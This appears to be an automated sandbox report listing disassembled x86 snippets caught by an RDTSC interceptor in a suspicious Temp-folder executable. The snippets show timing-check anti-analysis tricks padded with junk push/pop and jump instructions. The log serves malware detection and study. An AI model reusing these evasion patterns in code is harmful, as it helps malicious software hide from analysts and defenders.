Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAD9C3 second address: DAD9C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DADD8A second address: DADDA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jns 00007FC4CC910586h 0x0000000b push eax 0x0000000c pop eax 0x0000000d jng 00007FC4CC910586h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 ja 00007FC4CC91058Eh 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DAC832 second address: DAC836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D1F81D second address: D1F827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FC4CC910586h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D1F827 second address: D1F82D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D1F82D second address: D1F833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB5D4E second address: DB5D60 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FC4CCEF6AE9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB5D60 second address: DB5D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC91058Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC4CC91058Bh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB5D80 second address: DB5DA2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 jmp 00007FC4CCEF6ADFh 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB5DA2 second address: DB5DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC4CC91058Ch 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB8C4E second address: DB8C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB866A second address: DB86A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 jns 00007FC4CC910586h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC4CC910594h 0x00000018 jmp 00007FC4CC910597h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB89AA second address: DB89AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB89AE second address: DB89B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DB89B4 second address: DB89BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBAC1E second address: DBAC22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBAC22 second address: DBAC2A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBADB0 second address: DBADE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FC4CC910595h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBADE6 second address: DBADEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0BC9 second address: DC0BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0BCF second address: DC0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0BD5 second address: DC0BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBFE87 second address: DBFEAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE4h 0x00000007 jns 00007FC4CCEF6AD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007FC4CCEF6AE2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBFEAD second address: DBFEB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DBFFF5 second address: DC0001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0141 second address: DC0174 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC4CC910586h 0x00000008 jmp 00007FC4CC910593h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007FC4CC910586h 0x00000018 pop ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e pop eax 0x0000001f jo 00007FC4CC910586h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC05FD second address: DC0620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE9h 0x00000007 jnp 00007FC4CCEF6AD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC0620 second address: DC0630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4CC91058Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC4E6F second address: DC4E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC500B second address: DC5018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC5018 second address: DC501C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC52FF second address: DC5323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4CC910591h 0x00000008 jmp 00007FC4CC91058Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D71591 second address: D715E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FC4CCEF6ADCh 0x0000000c popad 0x0000000d push eax 0x0000000e jnl 00007FC4CCEF6AE8h 0x00000014 nop 0x00000015 sub edx, dword ptr [ebp+124766D5h] 0x0000001b push 00000004h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FC4CCEF6AD8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000015h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 nop 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: D715E9 second address: D715ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC5FF4 second address: DC5FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8FAC second address: DC8FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007FC4CC910586h 0x0000000e js 00007FC4CC910586h 0x00000014 pop eax 0x00000015 popad 0x00000016 pushad 0x00000017 push edx 0x00000018 jp 00007FC4CC910586h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8FCC second address: DC8FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FC4CCEF6ADCh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8FE1 second address: DC8FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC887B second address: DC8884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8884 second address: DC8888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8888 second address: DC888E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8A3C second address: DC8A42 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8A42 second address: DC8A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD0C80 second address: DD0CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910591h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC4CC910596h 0x00000011 pushad 0x00000012 jp 00007FC4CC910586h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD0CB7 second address: DD0CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC4CCEF6AD6h 0x0000000a jmp 00007FC4CCEF6AE4h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC4CCEF6AE4h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD0CEE second address: DD0CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF558 second address: DCF564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF564 second address: DCF56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF56C second address: DCF577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF577 second address: DCF57C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF57C second address: DCF584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF7FE second address: DCF80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FC4CC910586h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFB2D second address: DCFB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC4CCEF6AD6h 0x0000000a jg 00007FC4CCEF6AD6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFB3F second address: DCFB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFB44 second address: DCFB6D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC4CCEF6AEAh 0x00000008 pushad 0x00000009 jnl 00007FC4CCEF6AD6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFE0D second address: DCFE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFE11 second address: DCFE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFE15 second address: DCFE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD098C second address: DD099A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CCEF6ADAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD099A second address: DD09A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC4CC910586h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD09A8 second address: DD09AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD09AC second address: DD09B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD09B2 second address: DD09B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD222D second address: DD2238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC4CC910586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD5E63 second address: DD5E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD4FCF second address: DD4FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007FC4CC910586h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD4FE3 second address: DD4FED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC4CCEF6AD6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD526D second address: DD5280 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC4CC910586h 0x00000008 jp 00007FC4CC910586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD571E second address: DD5724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD5AC4 second address: DD5AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC910598h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC4CC910596h 0x00000011 jp 00007FC4CC910586h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD5AFF second address: DD5B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC4CCEF6ADCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DDA3CD second address: DDA3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DDA3D1 second address: DDA3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC4CCEF6ADFh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DDA3EF second address: DDA40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC4CC910595h 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1707 second address: DE1728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE1h 0x00000007 je 00007FC4CCEF6AD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1728 second address: DE174E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4CC910586h 0x00000008 jmp 00007FC4CC910599h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE174E second address: DE177B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC4CCEF6AD6h 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FC4CCEF6ADEh 0x00000012 pushad 0x00000013 jne 00007FC4CCEF6AD6h 0x00000019 jp 00007FC4CCEF6AD6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE177B second address: DE177F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1A74 second address: DE1A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
